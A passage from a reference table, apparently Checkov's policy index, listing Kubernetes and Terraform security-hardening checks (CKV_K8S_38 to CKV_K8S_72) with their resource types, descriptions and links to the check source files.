| resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2827 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2828 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2829 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2830 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2831 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2832 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2833 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2834 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2835 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2836 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2837 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2838 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2839 | CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2840 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2841 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2842 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2843 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2844 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2845 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2846 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2847 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2848 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2849 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2850 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2851 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2852 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2853 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2854 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2855 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) | -| 2856 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 2857 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 2858 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | -| 2859 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | -| 2860 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2861 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2862 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2863 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2864 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2865 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2866 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2867 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2868 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2869 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2870 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2871 | CKV_K8S_43 | resource | ReplicaSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2872 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2873 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2874 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2875 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2876 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2877 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2878 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | -| 2879 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2880 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2881 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2882 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2883 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2884 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2885 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2886 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2887 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2888 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2889 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2890 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2891 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2892 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2893 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2894 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2895 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2896 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2897 | CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2898 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2899 | CKV_K8S_68 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2900 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2901 | CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2902 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2903 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2904 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2905 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2906 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2907 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2908 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2909 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2910 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2911 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2912 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2913 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2914 | CKV_K8S_69 | resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2915 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2916 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2917 | CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2918 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2919 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2920 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2921 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2922 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2923 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2924 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2925 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2926 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2927 | CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2928 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2929 | CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2930 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2931 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2932 | CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2933 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2934 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2935 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2936 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2937 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2938 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2939 | CKV_K8S_72 | resource | Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2940 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2941 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2942 | CKV_K8S_72 | resource | Pod | 